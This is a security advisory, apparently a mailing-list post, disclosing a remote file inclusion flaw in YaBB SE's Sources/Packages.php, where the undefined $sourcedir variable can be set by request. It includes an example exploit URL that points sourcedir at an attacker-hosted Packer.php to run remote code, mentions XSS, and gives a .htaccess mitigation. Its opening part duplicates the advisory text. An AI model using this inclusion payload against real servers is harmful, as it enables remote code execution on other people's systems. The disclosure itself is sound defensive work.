YabbSE keeps all of it's function includes in a directory called "Sources" which
is not protected. Inside this directory a file called Packages.php exists. This
file is supposed to be included and not called directly, but if an attacker calls
it directly he/she may cause the script to run remote arbitrary code.
Bellow are a couple of the first lines in Packages.php:
********
..
global $adminplver;
$Packagesphpver="YaBB SE 1.4.1";
$safe_mode = ini_get("safe_mode");
$pacmanver = "1.4.1";
include_once("$sourcedir/Packer.php");
..
********
We can see here that the variable $sourcedir is never defined and therefore may be
defined through global injection.
Example:
Please check the vendor's website for new patches.
As a temporary solution, create a .htaccess file that contains 'Deny from all'.
Place it in the /Sources/ directory and that should block remote users from accessing it.
YabbSE Remote Code Execution Vulnerability ( By Mindwarper :: mindwarper (at) hush (dot) com [email concealed] :: )
<------- ------->
----------------------
Vendor Information:
----------------------
Homepage : http://www.yabbse.org
Vendor : informed
Mailed advisory: 21/01/02
Vender Response : None
----------------------
Affected Versions:
----------------------
All versions prior to 1.5.0
----------------------
Vulnerability:
----------------------
YabbSE keeps all of it's function includes in a directory called "Sources" which
is not protected. Inside this directory a file called Packages.php exists. This
file is supposed to be included and not called directly, but if an attacker calls
it directly he/she may cause the script to run remote arbitrary code.
Bellow are a couple of the first lines in Packages.php:
********
..
global $adminplver;
$Packagesphpver="YaBB SE 1.4.1";
$safe_mode = ini_get("safe_mode");
$pacmanver = "1.4.1";
include_once("$sourcedir/Packer.php");
..
********
We can see here that the variable $sourcedir is never defined and therefore may be
defined through global injection.
Example:
http://victim/yabbse/Sources/Packages.php?sourcedir=http://attacker/
where the attacker server has a file called Packer.php.
An attacker may execute remote code on the server with webserver permissions.
Side-note: An attacker may also use this file for XSS attack on the server.
----------------------
Solution:
----------------------
Please check the vendor's website for new patches.
As a temporary solution, create a .htaccess file that contains 'Deny from all'.
Place it in the /Sources/ directory and that should block remote users from accessing it.
----------------------
Greetz:
----------------------
Hawkje, Truckle, Cyon, daemorhedron, Mithrandir
<------- ------->
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
[ reply ]